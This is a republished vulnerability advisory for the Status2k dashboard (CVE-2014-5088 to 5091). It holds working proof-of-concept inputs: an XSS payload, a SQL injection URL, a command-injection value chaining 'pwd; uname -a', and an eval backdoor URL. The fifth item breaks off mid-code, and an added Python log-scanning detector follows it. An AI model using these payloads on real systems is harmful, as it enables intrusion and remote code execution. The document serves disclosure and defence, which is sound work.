Status2k Multiple Cross-Site Scripting Vulnerabilities (CVE

Published: 2014-08-04
Updated: 2014-08-06

Affected systems:
Status2k Status2k
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69012
CVE(CAN) ID: CVE-2014-5088

Status2k is a self-hosted server statistics dashboard that gives a quick overview of a fleet of servers.

Status2k's implementation contains multiple cross-site scripting (XSS) vulnerabilities. An attacker can exploit them to execute arbitrary script code in the browser of a user of the affected site.

<*Source: Shayan Sadigh *>

Test method:
--------------------------------------------------------------------------------

Warning

The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!
# Exploit Title: Status2k Multiple Vulnerabilities/0days
# Date: 6/20/2014
# Exploit Author: Shayan Sadigh (twitter.com/r1pplex) | <ienjoy.ripples@gmail.com>
# Vendor Homepage:
# Version: All
# Tested on: Linux/Windows
# CVE : CVE-2014-5088, CVE-2014-5089, CVE-2014-5090, CVE-2014-5091, CVE-2014-5092, CVE-2014-5093, CVE-2014-5094

1. Cross site scripting/XSS... there's tons, example: admin login page, etc.

login.php:

if (isset($_GET['username'])) { $useren = $_GET['username']; }
if (isset($_POST['password'])) { $useren = $_POST['username']; }
$q = mysql_query("SELECT * FROM ".$prefix."users");
$adminuser = $res['adminuser']; // Login Database
$cusername = $_COOKIE["S2KUser"];
if ( ($cusername == $adminuser) && ($cpassword == $adminpass) ) { $lgtrue = 1; }
if ( ($useren == $adminuser) && ($passen == $adminpass) ) {
setcookie("S2KUser", $useren);
if ($passen && $useren) {
if ($useren !== $adminuser) { echo '<div>Username ('.$useren.') Incorrect.</div>'; }
<input type="text" size="25"

simple injection can be done in the username field, <script>alert("poc")</script>, etc.

Use CVE-2014-5088 for all of the XSS issues.


2. SQLi vulnerability in the GET (log) param... This isn't too useful seeing that if you had auth, much more damage could be done - refer to command injection.
Lack of sanitization in /admin/options/logs.php:

$l = $_GET['log'];
$q = mysql_query("SELECT * FROM ".$prefix."users");
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());
$query = mysql_query("SELECT * FROM ".$prefix."logs WHERE id = '".$l."'");
$result = mysql_fetch_array($query) or die(mysql_error());

- PoC: site.com/s2kdir/admin/options/logs.php?log=[sqli]

Use CVE-2014-5089.


3. Command injection
This requires access to the Status2k Admin Panel: log in and proceed to click the 'Logs' tab, then select 'Add Logs', type in any name and for the 'Location' field use command injection... Then browse to the created log via the 'Logs' tab again.

- example: Logs -> Add Logs -> ; then Logs -> newly created log

Name: test Location: /var/log/dmesg;pwd; uname -a
localhost/admin/options/addlog.php?type=edit&id=5

so there's no sanitization in addlog.php which lets you put anything you want as a log location... the issue now is that in logs.php:

$logc = cmdrun($config['logcmd'].$result['location']);
$log = explode("\n", $logc);
$log = array_reverse($log);

cmdrun literally calls the equivalent of exec() and thus allows complete execution of a command.

if it is complaining about dmesg... try other log locations... such as /usr/local/apache/logs/suexec_log, also try other bash chars, such as

| & && ; $(), etc

Use CVE-2014-5090.


4. eval() [RCE] backdoor..
For about a year, status2k.com was hosting a backdoored version of their software... whether they knew it or not, there was never an announcement when the backdoor was found (good job).

in the file /includes/functions.php:
eval($_GET['multies']);

site.com/s2k/includes/functions.php?multies=inject_php_code here

PoC: site.com/s2k/includes/functions.php?multies=echo 'foobar';

Use CVE-2014-5091.


5. Another RCE
status2k also lacks sanitization in the templates; /admin/options/editpl.php

one can literally place any malicious php code they want here and have it execute

// Let's make sure the file exists and is writable first.
if (is_writable("../../templates/".$config['templaten']."/".$filename)) {
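An added detection example, not part of the advisory or of the original post: it scans constructed Apache-style access-log lines for the request patterns the post describes (functions.php?multies=, a non-numeric logs.php?log=, HTML tag characters in any parameter) and audits a stored 'Location' value for the shell metacharacters the post lists. The command injection travels in a POST body, so it is checked against the stored value rather than the access log; the IPs, timestamps and payloads below are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines for this example; the paths and parameter
# names follow the advisory, the IPs, timestamps and payloads are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2014:10:00:01 +0000] "GET /s2k/includes/functions.php?multies=echo%20%27foobar%27%3B HTTP/1.1" 200 512
10.0.0.6 - - [04/Aug/2014:10:00:02 +0000] "GET /s2kdir/admin/options/logs.php?log=5%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048
10.0.0.7 - - [04/Aug/2014:10:00:03 +0000] "GET /s2kdir/admin/options/logs.php?log=5 HTTP/1.1" 200 2048
10.0.0.8 - - [04/Aug/2014:10:00:04 +0000] "GET /s2k/login.php?username=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900
10.0.0.9 - - [04/Aug/2014:10:00:05 +0000] "GET /s2k/index.php HTTP/1.1" 200 3000
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SHELL_META = re.compile(r'[;|&`$]')  # metacharacters the post lists for the 'Location' field


def classify_request(target):
    """Return the CVE a request target matches, or None when it looks benign."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    # Anything passed as functions.php?multies= reaches eval(): always hostile.
    if path.endswith("/includes/functions.php") and "multies" in params:
        return "CVE-2014-5091 eval backdoor"
    # logs.php concatenates ?log= into SQL; a legitimate id is purely numeric.
    if path.endswith("/admin/options/logs.php"):
        for value in params.get("log", []):
            if not re.fullmatch(r"\d+", value):
                return "CVE-2014-5089 SQL injection"
    # Reflected XSS: any parameter that carries HTML tag characters.
    for values in params.values():
        if any("<" in v or ">" in v for v in values):
            return "CVE-2014-5088 reflected XSS"
    return None


def scan_access_log(text):
    """Return (ip, target, finding) for every request line that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (finding := classify_request(m.group("target"))):
            hits.append((m.group("ip"), m.group("target"), finding))
    return hits


def audit_log_location(location):
    """Flag a stored 'Location' value that would be concatenated into cmdrun():
    shell metacharacters never belong in a log file path."""
    return bool(SHELL_META.search(location))
```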

Content copyright notice: unless otherwise noted, all articles are original to this site.

Reproduction must credit the source: http://www.heiqu.com/074fbc17997839f756aa7d7c02e26997.html